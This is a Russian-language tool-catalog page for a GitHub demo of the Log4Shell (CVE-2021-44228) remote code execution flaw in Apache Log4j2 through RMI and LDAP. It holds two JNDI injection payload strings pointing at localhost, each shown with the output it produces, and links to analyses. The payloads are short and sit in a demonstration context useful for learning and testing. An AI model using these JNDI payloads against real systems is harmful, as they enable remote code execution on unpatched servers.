Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-44228-Demo — Apache Log4j2 CVE-2021-44228: демонстрация RCE с RMI и LDAP | Kitploit
Инструменты/GitHubGitHub/mzlogin/cve-2021-44228-demo
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubmzlogin/cve-2021-44228-demo

CVE-2021-44228-Demo

Apache Log4j2 CVE-2021-44228: демонстрация RCE с RMI и LDAP

Репозиторий
2374 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-44228-Demo

Пример удаленного внедрения кода с использованием CVE-2021-44228 через RMI и LDAP.

Exploit class from RMI Server loaded
Hello, ${jndi:rmi://127.0.0.1:1099/exploit}
Exploit class from LDAP Server loaded
Hello, ${jndi:ldap://127.0.0.1:1389/org.mazhuang.ldap.Exploit}

Запуск RmiServer и LdapServer зависит от Python3.

Ссылки

  • Воспроизведение уязвимости удаленного выполнения кода Apache Log4j2
  • Уязвимость Log4j высокого риска! Анализ конкретных причин! Первый во всем интернете! и Уязвимость Log4j высокого риска (дополнительное видео)
  • Log4j Lookups
  • Apache Log4j2 от RCE до обхода RC1
  • tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
  • PSA: Log4Shell and the current state of JNDI injection
Скачать инструмент